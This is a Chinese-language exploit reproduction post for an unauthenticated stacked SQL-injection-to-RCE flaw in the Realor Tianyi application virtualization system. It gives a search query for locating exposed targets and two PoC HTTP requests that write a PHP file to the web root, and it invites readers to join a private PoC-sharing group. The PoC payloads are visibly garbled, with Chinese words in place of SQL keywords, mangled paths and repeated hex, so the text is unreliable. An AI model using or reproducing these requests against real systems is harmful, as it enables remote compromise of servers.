0x01 产品简介
瑞游天翼应用虚拟化系统是西安瑞游信息科技信息有限公司研发的基于服务器计算架构的具有自主知识产权的应用虚拟化平台。将各种用户应用软件集中部署在瑞游天翼服务器(群)上,客户可以通过WEB快速、安全地访问服务器上认可的应用软件,提供集中应用、远程访问、联合办公等功能。为用户提供安全、高效的虚拟化支撑平台。
0x02 漏洞概述
瑞游天翼应用虚拟化系统的\\Home\\Controller\\AdminController有appsave/appdel两个接口,不需要认证,攻击者可以利用php PDO默认支持堆叠,并利用堆叠写入恶意文件。到RCE。
0x03 搜索语法
app=\’REALOR-天翼应用虚拟化系统\’
0x04 漏洞复现
POC1
GET /index.php?s=/Admin/appsaveappid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b2075 6 c6 96e6b282466696c65293b%27%29+进入+输出文件+%27.%5C%5C.%5C%5C。 %5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host:你的IP
POC2
/hmrao.phphp?s=/admin/appsAVEAPPID=1%27%29%3BSELECT%200X3C3F706806806666666666666666666666666666666666666666666666666666666666666 获取666666666 666666666666E -20OUTFILLLE+%27C%5C -5C -5C -5C -5C% .%5c%5cwebroot%5c% 5cqwe%。 27%23 HTTP/1.1
Host:你的IP
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
使用VX扫描并加入我们内部的POC脚本共享圈。
#【漏洞复现】以上瑞游天翼应用虚拟化系统SQL注入远程代码执行漏洞相关内容来源于互联网,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91649.html